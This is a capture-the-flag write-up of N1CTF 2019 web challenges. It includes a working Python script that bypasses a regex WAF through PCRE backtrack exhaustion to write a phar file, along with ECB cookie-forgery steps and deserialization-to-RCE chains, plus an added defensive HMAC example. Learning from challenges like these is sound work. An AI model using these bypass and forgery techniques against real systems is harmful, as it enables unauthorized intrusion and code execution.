N1ctf-2019 web write-ups

Environment

https://github.com/Nu1LCTF/n1ctf-2019

sql_manage

It turned out to be a MySQL connection. This type of challenge appeared in DDCTF before: a Rogue-MySql-Server can be used directly to get arbitrary file read.
See https://blog.lou00.top/index.php/archives/5/
(Afterthought: there is an open_basedir restriction, so only files under /tmp can be read.)
Scanning the site turned up www.zip, so I started reading the source.
There is a WAF; it is the PCRE backtracking trick that p牛 set in Code-Breaking. See
https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html

if(preg_match('/sleep|BENCHMARK|processlist|GET_LOCK|information_schema|into.+?outfile|into.+?dumpfile|\/\*.*\*\//is', $query)) {
    die('Go out!!!');
}

Using select xx into/*1000000 a's*/dumpfile; bypasses it.
The source gives the username and password.

After logging in, it is MySQL phar deserialization:
https://paper.seebug.org/998/
https://xz.aliyun.com/t/2958
First generate a phar following https://blog.lou00.top/index.php/archives/43/,
then upload it:

#coding=utf-8
# Writes the hex literal (the phar bytes go here) to /tmp via dumpfile.
# The comment made of 1000000 'a' characters exhausts the PCRE backtrack
# limit, so the WAF's preg_match fails and "into ... dumpfile" gets through.
import requests
url = "http://47.91.213.248:8001/query"
a = 'a'*1000000
data = {
"query": "select 0x123456 into/*{}*/dumpfile '/tmp/smi1e123.phar';".format(a),
"code": "nuk9"
}
cookie = {
"PHPSESSID":"ik01ngjcquttltalvf7vk6aqap"
}

print(requests.post(url=url,data=data,cookies=cookie).text)

Then make the corresponding change in the Rogue-MySql-Server mentioned above,

and you get RCE.

Oldattack

Environment

It seems only a zip was given,
so I set up an environment along the way:
https://github.com/Lou00/ctf/tree/master/n1ctf2019/babyphoto

Solution

ECB encryption flaw (see reference).
First register an account with the username aaaaaaaaaaaaaaaa (16 a's),
then register another with the username aaaaaaaaaaaaaaaaadmin (16 a's followed by admin),
and fetch the auth_name of each:

xLdZDPEzDcZ2tEiw3ukP+WlQczQU0VC7h/KQUShV/Rw= 16*a
xLdZDPEzDcZ2tEiw3ukP+XpvRpFzQ90JQCMseDgJfCo= 16*aadmin

Strip the duplicated first block and what remains is admin's auth_name.

After swapping it into the cookie, the first flag is obtained.
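As an added example from the defender's side (not part of the original write-up), the following Python decodes the two auth_name values above and shows that they share exactly their first 16-byte block, which is the ECB signature that makes the cut-and-paste work; it then contrasts this with an HMAC-authenticated token that rejects truncated or tampered values. The key and the token layout in the hardened half are assumptions, not the challenge's code.

```python
import base64
import hashlib
import hmac

BLOCK = 16  # AES block size; both tokens above decode to exactly two blocks

# The two auth_name values quoted above, for "a"*16 and "a"*16 + "admin".
TOKEN_16A = "xLdZDPEzDcZ2tEiw3ukP+WlQczQU0VC7h/KQUShV/Rw="
TOKEN_16A_ADMIN = "xLdZDPEzDcZ2tEiw3ukP+XpvRpFzQ90JQCMseDgJfCo="


def blocks(token_b64):
    """Split a base64 token into its raw cipher blocks."""
    raw = base64.b64decode(token_b64)
    return [raw[i:i + BLOCK] for i in range(0, len(raw), BLOCK)]


def shared_block_positions(t1, t2):
    """Indices of cipher blocks that are byte-identical in both tokens.
    Under ECB, equal plaintext blocks give equal ciphertext blocks, so the
    block for "a"*16 repeats; a mode with a fresh IV/nonce would share none."""
    return [i for i, (x, y) in enumerate(zip(blocks(t1), blocks(t2)))
            if x == y]


# Hardened form (an assumption, not the challenge's code): authenticate the
# name with an HMAC and verify before trusting anything from the cookie.
TAG_LEN = hashlib.sha256().digest_size


def make_auth_token(name, key):
    tag = hmac.new(key, name.encode(), hashlib.sha256).digest()
    return base64.b64encode(name.encode() + tag).decode()


def verify_auth_token(token, key):
    """Return the name if the tag verifies, else None. The tag covers the
    whole name, so no block of one token can be reused for another name."""
    raw = base64.b64decode(token)
    if len(raw) <= TAG_LEN:
        return None
    name, tag = raw[:-TAG_LEN], raw[-TAG_LEN:]
    expected = hmac.new(key, name, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return name.decode()


if __name__ == "__main__":
    print("shared ECB blocks:", shared_block_positions(TOKEN_16A, TOKEN_16A_ADMIN))
```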

public function userpage(Request $request,$id)
{
    if($request->isMethod('get')){
        if(isset($_COOKIE['auth_name'])){
            $auth_check=$this->decrypt($_COOKIE['auth_name']);
        }else{
            $auth_check=Auth::user()->name;
        }
        if($auth_check==='admin'){
            $imgurl="";
            $usern='admin';
        }else{
            $imgurl="";
            $usern=Auth::user()->name;
        }
        return view('userpage')->with([
            'imgurl'=>$imgurl,
            'username'=>$usern,
            'id'=>$id
        ]);
    }else{
        if(Auth::user()->email_verified_at){
            $file=$request->file('avatar');
            $data=file_get_contents('/tmp/'.$file->getFilename());
            $filesize=$file->getClientSize();
            if($filesize > 204800){
                die("too big");
            }
            //waf is here.don't rce.
            $file->storeAs('avatars',md5(time().Auth::user()->id).'.gif');
        }else{
            die('NO!');
        }
    }
}

Here, entering the else branch requires the email to be verified.
That verification exists in route/api.php:

<?php

use Illuminate\Http\Request;
use Illuminate\Support\Facades\DB;
/*
|--------------------------------------------------------------------------
| API Routes
|--------------------------------------------------------------------------
|
| Here is where you can register API routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| is assigned the "api" middleware group. Enjoy building your API!
|
*/

Route::get('/user/{email}', function ($email) {
    DB::table('users')->where('email',$email)->update(['email_verified_at' => date('Y-m-d H:i:s',time())]);
})->where('email', '[A-Za-z0-9.@]+');

Visiting /api/user/{email} is enough.
Then, looking at /resources/views/userpage.blade.php:
<input type="hidden" name="user_session" value="@user_session($id)">
which calls the function shown in the figure below.

$id is the id we pass in, so it is controllable.
is_file can trigger deserialization, achieving RCE.